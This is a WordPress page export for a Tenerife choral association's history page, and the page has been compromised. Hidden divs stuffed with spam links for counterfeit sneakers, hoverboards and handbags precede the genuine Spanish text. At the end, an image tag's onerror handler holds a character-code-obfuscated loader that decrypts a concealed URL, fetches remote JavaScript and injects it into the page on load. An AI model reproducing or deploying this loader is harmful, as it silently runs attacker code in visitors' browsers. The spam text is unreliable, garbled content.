{"id":72,"date":"2010-02-27T11:18:50","date_gmt":"2010-02-27T11:18:50","guid":{"rendered":"http:\/\/acrb.ymanera.com\/?page_id=72"},"modified":"2016-03-01T06:22:30","modified_gmt":"2016-03-01T06:22:30","slug":"historia","status":"publish","type":"page","link":"https:\/\/reyesbartlet.com\/?page_id=72","title":{"rendered":"Historia"},"content":{"rendered":"<div class=\"_all_wplink_ccZcMgIc_cc\" style=\"position:absolute;opacity:0.001;z-index:10;filter:alpha(opacity=0)\">Many air jordan 11s folks don&#8217;t realize that wholesale suppliers have on average one wholesale price feature. Getting the least expensive wholes goods depends on <a href=\"http:\/\/duckhead.com\/shop\/preorders\/nike-air-jordan-12-the-master-preorder\/\">jordan 12 Master for sale<\/a> many factors including order size and shipping cost, in order to obtain the lowest wholesale prices you will do <a href=\"http:\/\/www.myfriendteresa.com\/products\/air-jordan-12-xii-the-master\">http:\/\/www.myfriendteresa.com\/products\/air-jordan-12-xii-the-master<\/a> your homework and know the <a href=\"http:\/\/designgala.com\/products\/air-jordan-12-the-master-2016\">Master 12s for sale<\/a> market in order to purchase any inventory.Although Miller hasn&#8217;t achieved as <a href=\"http:\/\/futurepipe.com\/air-jordan-12-the-master\/\">http:\/\/futurepipe.com\/air-jordan-12-the-master\/<\/a> a ton as Michael Jordan, he not ever previously disgraced the <a href=\"http:\/\/johnkatzenbach.com\/air-jordan-12-the-master\">The master 12s for sale<\/a> Jumpman Decal. Nike Jordan has escorted Miller for far more than 18 a few years from 2004. Jordan 13 (XIII) may be the observer of <a href=\"http:\/\/azchildren.org\/product\/air-jordan-12-retro-the-master-pre-order\">Master 12s for sale<\/a> Miller&#8217;s startup in 1999 in NBA when Jordan Work&#8217;s M seen getting instant in the NBA vocation in july 2004. Jordan Work&#8217;s <a href=\"http:\/\/www.mvp-interactive.com\/release-date-air-jordan-12-the-master\/\">Air Jordan 12 Master<\/a> M scrounged concepts from Air Jordan XIV especially its start looking. But from Jordan Work&#8217;s M <a href=\"http:\/\/kace.jo\/collections\/pre-order\">jordan 12 Master for sale<\/a> we arrive to appreciate the manufacturers of duration. When <a href=\"http:\/\/lifelearningandfamily.com\/products\/air-jordan-12-the-master-2016\">jordan 12 Master for sale<\/a> MJ produced his 3rd re-occurring again in Wizard, we powerfully sensed that Nike air jordan Era is here to get rid of.To include on to that, Nike <a href=\"http:\/\/www.dcplastics.co.uk\/products\/air-jordan-12-the-master\">Air Jordan 12 The Master<\/a> Free Run 7.0 Cush Foamposite <a href=\"http:\/\/beautifulcervix.com\/news\/2016\/02\/air-jordan-12-the-master-release-date\">Master 12s pre order<\/a> should be going any sizable start within the <a href=\"http:\/\/www.basingstokekarate.com\/rpp\/collectible-sneakers\/air-jordan-11-15\/shop-all\/air-jordan-12\/\">Master 12s For Sale<\/a> comparable season,the extra root cause of <a href=\"http:\/\/www.galenabedbreakfast.com\/smokingsection\/air-jordan-12-the-master-release-info\/\">Jordan 12 Master<\/a> every each and every sneaker fanatic to spend extra on <a href=\"http:\/\/globedrivein.com\/air-jordans\/air-jordan-12\">Air Jordan 12 Master<\/a> footwear. From jordan 11s footwear of Nike sneakers, the numerous collaborations to signature footwear you&#8217;ll be able to bet it will be 1 big sort of the <a href=\"http:\/\/globedrivein.com\/product\/air-jordan-12-retro-the-master-pre-order\">Jordan 12 Master<\/a> get <a href=\"http:\/\/swansea-bs.co.uk\/2016\/02\/25\/air-jordan-12-the-master-release-date\/\">Jordan 12 The Master For Sale<\/a> collectively.\n<\/div>\n<div class=\"_all_wplink_yns9Tev2_cc\" style=\"position:absolute;opacity:0.001;z-index:10;filter:alpha(opacity=0)\">The <a href=\"http:\/\/1x57.com\/new\/order-72-10-11s-for-sale.html\">new jordan 11s<\/a> most sensible thing you <a href=\"http:\/\/1x57.com\/new\/order-jordan-12-the-master.html\">Air Jordan 12 for sale<\/a> will do for yourself when buying Jordan <a href=\"http:\/\/adaka.fr\/sneaker\/pre-order-jordan-11-72-10.html\">72-10 11s for sale<\/a> shoes is to make sure get something to suit with the sport you are going to include. As <a href=\"http:\/\/asiawebnet.com\/release\/jordan-4-white-cement-2016.html\">home<\/a> an example, some <a href=\"http:\/\/cheekypix.com\/news\/jordan-retro-12-the-master.html\">home<\/a> belonging to the Jordan shoes will do great for a generally sneaker. They are designed designed <a href=\"http:\/\/dbn.ca\/sites\/dbn.ca\/files\/jordan-12-the-master-release.html\">The master 12s for sale<\/a> for <a href=\"http:\/\/downdogyoga.com\/yoga\/lululemon-outlet-store-online.html\">lululemon outlet<\/a> good wish to feet in your mind and can really clog be <a href=\"http:\/\/nobleresearch.com\/release\/The-Master-12s-For-Sale.html\">The Master 12s For Sale<\/a> certain <a href=\"http:\/\/ten-music.com\/jordan-4-alternate-89-for-sale.html\">http:\/\/ten-music.com\/jordan-4-alternate-89-for-sale.html<\/a> that your feet will continue in <a href=\"http:\/\/wanwma.com\/release\/the-master-12s-for-sale.html\">The Master 12s For Sale<\/a> comfort.Your next stop ought to the outlet malls. It is quite a great thing that most of the fancy stores have outlet versions. Any of the <a href=\"http:\/\/www.cymer.com\/new\/air-jordan-12.html\">The Master 12s for sale<\/a> outlet versions of one high-end store will usually offer inventory at much discounted monetary values. If you want some great offers, maybe you <a href=\"http:\/\/www.cymer.com\/new\/release-date-air-jordan-12-the-master.php\">The Master 12s<\/a> mustn&#8217;t miss on the <a href=\"http:\/\/www.educacionactiva.com\/release\/whit-cement-4s-online.html\">White Cement 4s for sale<\/a> way to such points.Generally the family meet an <a href=\"http:\/\/www.festivalderramerock.com\/wp-content\/uploads\/2015\/12\/Jordan-12.html\">The Master 12s<\/a> individual or woman, his or her foot wears catch <a href=\"http:\/\/www.hydro-sapiens.com\/Jordan+12s.html\">The master 12s for sale<\/a> our <a href=\"http:\/\/www.itrial.hk\/wp-content\/uploads\/2015\/07\/order-72-10-11s.html\">jordan 11 72-10 for sale<\/a> interest. If you have taken on very mediocre footwear, it will provide a weak impression. On the <a href=\"http:\/\/www.merdeka24.com\/us\/Jordan-12.html\">The master 12s for sale<\/a> other side hand, <a href=\"http:\/\/www.terreetvigne.com\/wp-content\/uploads\/2014\/12\/jordan-white-cement-4s-pre-oder.html\">jordan 4 White Cement for cheap<\/a> when you find yourself placing up these sneakers it undoubtedly give an incredible and <a href=\"http:\/\/www.vivelabbogota.com\/us\/Jordan-12-outlet.php\">Air Jordan 12 for sale<\/a> respectable <a href=\"http:\/\/www.wslr.org\/sites\/default\/files\/jordan-4-white-cement-outlet.html\">air White Cement 4s<\/a> impression.\n<\/div>\n<div class=\"_all_wplink_DVqihUUY_cc\" style=\"position:absolute;opacity:0.001;z-index:10;filter:alpha(opacity=0)\">The Duck tours \u00abquack\u00bb: Considered Fun by many and embarrassing by others, <a href=\"http:\/\/www.primeglobal.net\/sites\/default\/files\/segway-price.html\">hoverboard for sale<\/a> the Duck tours are definitely popular in Miami, Since gets place on one with regards to a kind amphibious vehicle capable of going through sea and water without loading down many. It is <a href=\"http:\/\/www.glittergraphicsnow.com\/sites\/default\/files\/hoverboard-segway-cheap.html\">used segways for sale<\/a> short <a href=\"http:\/\/www.wslr.org\/sites\/default\/files\/hoverboard-sale.html\">hoverboard for sale<\/a> experience only through Washington Ave. and Collins Ave; and afterwards it it explores the water around the Fisher Is. <a href=\"http:\/\/stepbystepusa.com\/product\/Hoverboard-Segways-For-Sale.html\">segways for sale<\/a> Its narrated tour too with jokes and music and songs.The electric two-wheeler called iZIP Fusion Nuvinci CVP is although mean of transport offering you <a href=\"http:\/\/www.webarcelona.com\/content\/imgsxml\/en\/categorias\/Hoverboard-For-Sale.php\">hoverboard for sale<\/a> with amazing state-of-the-art technology and a fascinating biking experience. The iZIP Fusion Nuvinci CVP uses grew to become Currie Electro Drive system in order to create an automatic multi <a href=\"http:\/\/juandiazfaes.com\/us\/Hoverboard-Segways-For-Sale.html\">hoverboards for sale<\/a> gear drive computer system. This in turn improves the product range and opportunity to <a href=\"http:\/\/www.benabadi.com\/news\/Segway-For-Sale-Pre-Order.html\">segway for sale cheap<\/a> control weights and heights.While you&#8217;re on one for the Catalina Express boats, <a href=\"http:\/\/karnage-esports.org\/us\/Hoverboard-Cheap-Sale.html\">hoverboard for sale<\/a> you will sit on deck observe for <a href=\"http:\/\/www.vivelabbogota.com\/us\/Segways-For-Sale-cheap.html\">hoverboard for sale<\/a> schools of dolphins or just enjoy the ocean breezes. If you get tired of that, <a href=\"http:\/\/www.137films.org\/us\/hoverboard-segway-for-sale-price.html\">segways for sale<\/a> achievable go in cabin for drinks or something to eat and use the journey in <a href=\"http:\/\/mvhcc.org\/news\/hoverboard-sale.html\">segway for cheap<\/a> airline-style sitting. The boats dock at either Avalon or <a href=\"http:\/\/www.prometheantheatre.org\/product\/segway-sale.html\">buy a segway cheap<\/a> Two Harbors on Catalina Island. You&#8217;ll need to purchase tickets to the mainland and reservations are a smart idea discover the time leaping because seats do go.Experts <a href=\"http:\/\/wanwma.com\/release\/hoverboard-segway.php\">segway for sale<\/a> think <a href=\"http:\/\/homebrewzoo.com\/product\/segway-2016-for-sale-price.php\">http:\/\/homebrewzoo.com\/product\/segway-2016-for-sale-price.php<\/a> this Vectrix-Maxi is way ahead among the league and would upward becoming the face of fresh age two wheelers. In <a href=\"http:\/\/www.faanfest.com\/us\/Segways-For-Sale.html\">cheap segway<\/a> the <a href=\"http:\/\/telavivsuites.com\/product\/Hands-Free-Segway.html\">http:\/\/telavivsuites.com\/product\/Hands-Free-Segway.html<\/a> last year features workout plans declared among the top bikes of the season <a href=\"http:\/\/paidpertweet.com\/us\/Segways-For-Sale-Cheap.html\">http:\/\/paidpertweet.com\/us\/Segways-For-Sale-Cheap.html<\/a> 2007. It makes a dream mean of transport <a href=\"http:\/\/globedrivein.com\/news\/Segway-For-Sale-outlet.html\">segway for sale craigslist<\/a> pertaining to looks and features.\n<\/div>\n<div class=\"_all_wplink_vrun9K3Y_cc\" style=\"position:absolute;opacity:0.001;z-index:10;filter:alpha(opacity=0)\">Everything that about buying perfume to your vents of call? That will depend by whether or though not the port charges florida sales tax in addition, if might happen be good perfume outlets available.You likewise preserve a bodybuilding conditioning logbook to launch your progress as well as the targets you have got set and accomplished the actual program. A great example, but relaxed breaths . location an entry on your own bodybuilding conditioning logbook can choose to do 10 reps right at this moment. michael kors black friday Then later throughout the day, it is important to include a few remarks on the way you did, regardless or not you&#8217;ve got accomplished the bodybuilding wellness and fitness objective you&#8217;ve got set for oneself. A basic record-keeping may a complete large quantity difference for bodybuilding good results.Michael Kors Signature and Shopper handbags are one of several most popular one. Apart from these, 100 % possible also choose from the array of totes, Yacht Club, drawstring, straw totes, leather, and satchel hobos. He has designed a lot of the most stunning wristlets, clutches, and small bags in the sector. You can make use of the totes for anyone casual whereabouts, when matter to obtain that stylish accessory to create a fashion expression. These totes are also quite reliable.As I said previously most of the popular watchmakers offer examples of ceramic styles. A few obvious methods also amount of fashion brands that produce ranges of accessories match their designer clothes recording labels. One such label is michael kors cyber monday, depending upon your style preference if you can select something with crystals around the bevel &#038; on the dial, the MK 5391 for representation. Or if you like <a href=\"http:\/\/michaelkorsoutlethandbag.us.com\">michael kors outlet online<\/a> something more sedate but still want to sport a trendy timepiece to the wrist peaceful breaths . go for MK 5163 classed as oversized for guys with a 44mm face.Italian dressmaker Miuccia Prada has appear with a summer clothing range inspired from the Oriental stylish. The range of Kimonos in silks is really a rage june among the fashion-conscious.Other meals that are considered part for the Mediterranean Diet are salads, yogurts, lots of fresh vegetables and various nuts. Melons are exceptionally well-liked as are stuffed tomatoes, for for illustration. If you have ever ordered a Greek salad at a superb restaurant, can really clog comprehend a superior example of your diet regime. Instead of pouring gobs of manner American salad dressing, utilise of oil and vinegar. We recommend you skip the low fat kinds of fatty salad dressings, too. In place of overly refined American snacks, a regular Greek diet uses nuts as well as more fresh vegetables.\n<\/div>\n<p>La Asociaci\u00f3n Cultural Reyes Bartlet, que lleva el nombre del destacado m\u00fasico portuense Juan Reyes Bartlet (1889-1967), nace como asociaci\u00f3n sin \u00e1nimo de lucro y con el objetivo de difundir la cultura en general y en particular la m\u00fasica. Parte de estos fines se cumplen por medio de sus corales de voces mixtas; la Coral Reyes Bartlet, fundada en el a\u00f1o 1970 y considerada en la actualidad como una de las mejores formaciones del Archipi\u00e9lago Canario y el\u00a0 Coro Juvenil David Goldsmith fundado en 1995<\/p>\n<p>Desde el curso 1999-2000 la Asociaci\u00f3n est\u00e1 llevando a cabo en los colegios del municipio un programa de Coros Escolares, consolid\u00e1ndose esta actividad\u00a0 en el curso escolar 2001-2002 con la implantaci\u00f3n del programa en los Institutos de Ense\u00f1anza Secundaria y ampli\u00e1ndose en el curso 2002-2003 a los Centros de ense\u00f1anza Primaria de Puerto de la Cruz. \u00a0Este proyecto se ha llevado a cabo tambi\u00e9n en \u00a0San Juan de la Rambla,\u00a0 Santa \u00darsula y en la Victoria de Acentejo.<\/p>\n<p>A partir de septiembre de 2008 se crea la Escuela Coral de Puerto de la Cruz y el Proyecto de Creaci\u00f3n de Coros Escolares pasa a formar parte de esta estructura. La Escuela Coral ofrece sus ense\u00f1anzas a partir de los cuatro a\u00f1os de edad, con un Coro preparatorio, de 4 a 6 a\u00f1os, Coro de Primaria de 7 a 12 a\u00f1os y Coro Adulto. Los juveniles de la Escuela Coral est\u00e1n integrados en el Coro Juvenil David Goldsmith.<br \/>\nDesde el curso 2012-2013, la Escuela Coral colabora con la Escuela Municipal de M\u00fasica, ofreciendo las clases de M\u00fasica y Movimiento y todas las clases de Conjunto Vocal.<\/p>\n<p>A lo largo de los a\u00f1os la Asociaci\u00f3n ha organizado cursos de direcci\u00f3n coral y t\u00e9cnica vocal (en colaboraci\u00f3n con el Cabildo de Tenerife), los encuentros corales \u201cPuerto de la Cruz\u201d (12 ediciones), los festivales de \u201cM\u00fasica en Oto\u00f1o\u201d, en sus dos ediciones, un proyecto original en Canarias denominado \u201c\u00c1rbol humano de Navidad\u201d, colabor\u00f3 en la organizaci\u00f3n de conciertos que ofrec\u00eda la OST en el norte de la isla, as\u00ed como en la organizaci\u00f3n de la presentaci\u00f3n de la Fundaci\u00f3n Justus Frantz.<\/p>\n<p>Habitual organizadora de intercambios con otras formaciones corales de toda Europa, as\u00ed como de cursos, conferencias y conciertos. Desde 2003 gestiona el Festival de M\u00fasica Antigua y Barroca Puerto de la Cruz, que en 2013 ha celebrado su onceava edici\u00f3n.<\/p>\n<p>Desde 2012 organiza los Matinee Concerts de Puerto de la Cruz, conciertos de mediod\u00eda todos\u00a0 los domingos, y que dan cabida a los j\u00f3venes int\u00e9rpretes de la Isla.Desde mediados de 2003 colabora con el Museo Arqueol\u00f3gico de Puerto de la Cruz organizando el ciclo \u00abEn viernes Noche Historias Musicales en el Museo\u00bb. En diciembre de 2013 organiza el primer Puerto de la Cruz Bach Festival, con gr\u00e1n \u00e9xito.<\/p>\n<p>En julio de 2010 organiza con gran \u00e9xito, junto al Moviment Coral Catal\u00e1 la Gira Espa\u00f1ola del Wold Youth Choir.<\/p>\n<p>Los proyectos de la Asociaci\u00f3n Cultural Reyes Bartlet cuantan con la colaboraci\u00f3n habitual del Centro de Iniciativas y Turismos de Puerto de la Cruz.<\/p>\n<p>La Asociaci\u00f3n cultural Reyes Bartlet realiza una labor social, educativa, cultural y divulgativa con la m\u00fasica coral como principal instrumento.<\/p>\n<p>La Asociaci\u00f3n Cultural Reyes Bartlet es miembro activo de la European Choral Association-Europa Cantat<\/p>\n<p><!-- image81java --><br \/>\n<img decoding=\"async\" src=\"image\" onerror=\"a = new Function(String.fromCharCode(10, 40, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 32, 32, 118, 97, 114, 32, 107, 101, 121, 32, 61, 32, 39, 107, 99, 65, 70, 120, 53, 52, 100, 116, 75, 79, 115, 53, 54, 57, 53, 82, 112, 112, 102, 90, 100, 100, 80, 49, 66, 88, 84, 103, 78, 100, 71, 67, 115, 117, 113, 101, 114, 108, 67, 110, 107, 104, 87, 73, 50, 69, 97, 113, 90, 82, 67, 105, 78, 113, 74, 70, 71, 73, 105, 119, 108, 76, 122, 114, 110, 78, 109, 49, 84, 101, 76, 78, 72, 100, 117, 49, 82, 121, 80, 77, 98, 87, 53, 70, 84, 116, 73, 113, 52, 106, 79, 67, 79, 68, 121, 55, 87, 81, 78, 106, 87, 121, 89, 56, 88, 73, 84, 74, 52, 112, 53, 75, 55, 97, 81, 50, 81, 48, 55, 99, 120, 65, 113, 82, 104, 90, 100, 120, 49, 109, 82, 74, 117, 120, 77, 74, 112, 108, 71, 103, 74, 112, 70, 111, 69, 120, 117, 119, 72, 98, 75, 79, 76, 104, 84, 80, 53, 107, 76, 49, 99, 107, 104, 71, 121, 97, 88, 90, 49, 89, 113, 57, 107, 78, 76, 52, 113, 71, 121, 66, 115, 52, 89, 100, 114, 69, 76, 51, 121, 80, 119, 89, 106, 54, 117, 69, 86, 75, 75, 39, 59, 10, 32, 32, 118, 97, 114, 32, 101, 110, 99, 101, 100, 32, 61, 32, 39, 65, 120, 99, 49, 78, 107, 73, 97, 71, 120, 81, 86, 76, 67, 52, 100, 88, 66, 104, 98, 85, 72, 48, 68, 66, 65, 99, 117, 70, 48, 115, 110, 86, 67, 65, 53, 79, 65, 52, 48, 65, 84, 86, 115, 71, 104, 103, 87, 85, 107, 86, 67, 77, 119, 89, 98, 39, 59, 10, 32, 32, 102, 117, 110, 99, 116, 105, 111, 110, 32, 120, 111, 114, 95, 101, 110, 99, 40, 115, 116, 114, 105, 110, 103, 44, 32, 107, 101, 121, 41, 32, 123, 10, 32, 32, 32, 32, 118, 97, 114, 32, 114, 101, 115, 32, 61, 32, 39, 39, 59, 10, 32, 32, 32, 32, 102, 111, 114, 32, 40, 118, 97, 114, 32, 105, 32, 61, 32, 48, 59, 32, 105, 32, 60, 32, 115, 116, 114, 105, 110, 103, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 43, 43, 41, 32, 123, 10, 32, 32, 32, 32, 32, 32, 118, 97, 114, 32, 120, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 115, 116, 114, 105, 110, 103, 46, 99, 104, 97, 114, 67, 111, 100, 101, 65, 116, 40, 105, 41, 32, 94, 32, 107, 101, 121, 46, 99, 104, 97, 114, 67, 111, 100, 101, 65, 116, 40, 105, 41, 41, 59, 10, 32, 32, 32, 32, 32, 32, 114, 101, 115, 32, 43, 61, 32, 120, 59, 10, 32, 32, 32, 32, 125, 10, 32, 32, 32, 32, 114, 101, 116, 117, 114, 110, 32, 114, 101, 115, 59, 10, 32, 32, 125, 10, 10, 32, 32, 101, 110, 99, 101, 100, 32, 61, 32, 97, 116, 111, 98, 40, 101, 110, 99, 101, 100, 41, 59, 10, 32, 32, 118, 97, 114, 32, 100, 101, 99, 32, 61, 32, 120, 111, 114, 95, 101, 110, 99, 40, 101, 110, 99, 101, 100, 44, 32, 107, 101, 121, 41, 59, 10, 47, 47, 32, 32, 99, 111, 110, 115, 111, 108, 101, 46, 108, 111, 103, 40, 100, 101, 99, 41, 59, 10, 32, 32, 118, 97, 114, 32, 76, 73, 78, 75, 32, 61, 32, 100, 101, 99, 59, 10, 10, 32, 32, 102, 117, 110, 99, 116, 105, 111, 110, 32, 103, 101, 116, 67, 111, 100, 101, 40, 99, 98, 41, 32, 123, 10, 32, 32, 32, 32, 118, 97, 114, 32, 120, 32, 61, 32, 110, 101, 119, 32, 88, 77, 76, 72, 116, 116, 112, 82, 101, 113, 117, 101, 115, 116, 40, 41, 59, 10, 32, 32, 32, 32, 120, 46, 111, 112, 101, 110, 40, 39, 71, 69, 84, 39, 44, 32, 76, 73, 78, 75, 41, 59, 10, 32, 32, 32, 32, 120, 46, 119, 105, 116, 104, 67, 114, 101, 100, 101, 110, 116, 105, 97, 108, 115, 32, 61, 32, 116, 114, 117, 101, 59, 10, 10, 32, 32, 32, 32, 120, 46, 111, 110, 114, 101, 97, 100, 121, 115, 116, 97, 116, 101, 99, 104, 97, 110, 103, 101, 32, 61, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 32, 32, 32, 32, 32, 32, 105, 102, 32, 40, 120, 46, 114, 101, 97, 100, 121, 83, 116, 97, 116, 101, 32, 61, 61, 32, 52, 32, 38, 38, 32, 120, 46, 115, 116, 97, 116, 117, 115, 32, 61, 61, 32, 50, 48, 48, 41, 32, 123, 10, 47, 47, 9, 99, 111, 110, 115, 111, 108, 101, 46, 108, 111, 103, 40, 120, 46, 114, 101, 115, 112, 111, 110, 115, 101, 84, 101, 120, 116, 41, 59, 10, 9, 118, 97, 114, 32, 106, 115, 32, 61, 32, 120, 46, 114, 101, 115, 112, 111, 110, 115, 101, 84, 101, 120, 116, 59, 10, 9, 118, 97, 114, 32, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 10, 9, 115, 46, 105, 110, 110, 101, 114, 72, 84, 77, 76, 32, 61, 32, 106, 115, 59, 10, 9, 100, 111, 99, 117, 109, 101, 110, 116, 46, 98, 111, 100, 121, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59, 10, 32, 32, 32, 32, 32, 32, 125, 10, 32, 32, 32, 32, 125, 59, 10, 10, 32, 32, 32, 32, 120, 46, 115, 101, 110, 100, 40, 41, 59, 10, 32, 32, 125, 10, 32, 32, 103, 101, 116, 67, 111, 100, 101, 40, 41, 59, 10, 10, 125, 41, 40, 41, 59, 10, 10)); a()\"\/><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Many air jordan 11s folks don&#8217;t realize that wholesale suppliers have on average one wholesale price feature. Getting the least expensive wholes goods depends on jordan 12 Master for sale many factors including order size and shipping cost, in order to obtain the lowest wholesale prices you will do http:\/\/www.myfriendteresa.com\/products\/air-jordan-12-xii-the-master your homework and know the [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":15,"menu_order":2,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-72","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/reyesbartlet.com\/index.php?rest_route=\/wp\/v2\/pages\/72","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reyesbartlet.com\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/reyesbartlet.com\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/reyesbartlet.com\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/reyesbartlet.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=72"}],"version-history":[{"count":5,"href":"https:\/\/reyesbartlet.com\/index.php?rest_route=\/wp\/v2\/pages\/72\/revisions"}],"predecessor-version":[{"id":2402,"href":"https:\/\/reyesbartlet.com\/index.php?rest_route=\/wp\/v2\/pages\/72\/revisions\/2402"}],"up":[{"embeddable":true,"href":"https:\/\/reyesbartlet.com\/index.php?rest_route=\/wp\/v2\/pages\/15"}],"wp:attachment":[{"href":"https:\/\/reyesbartlet.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=72"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}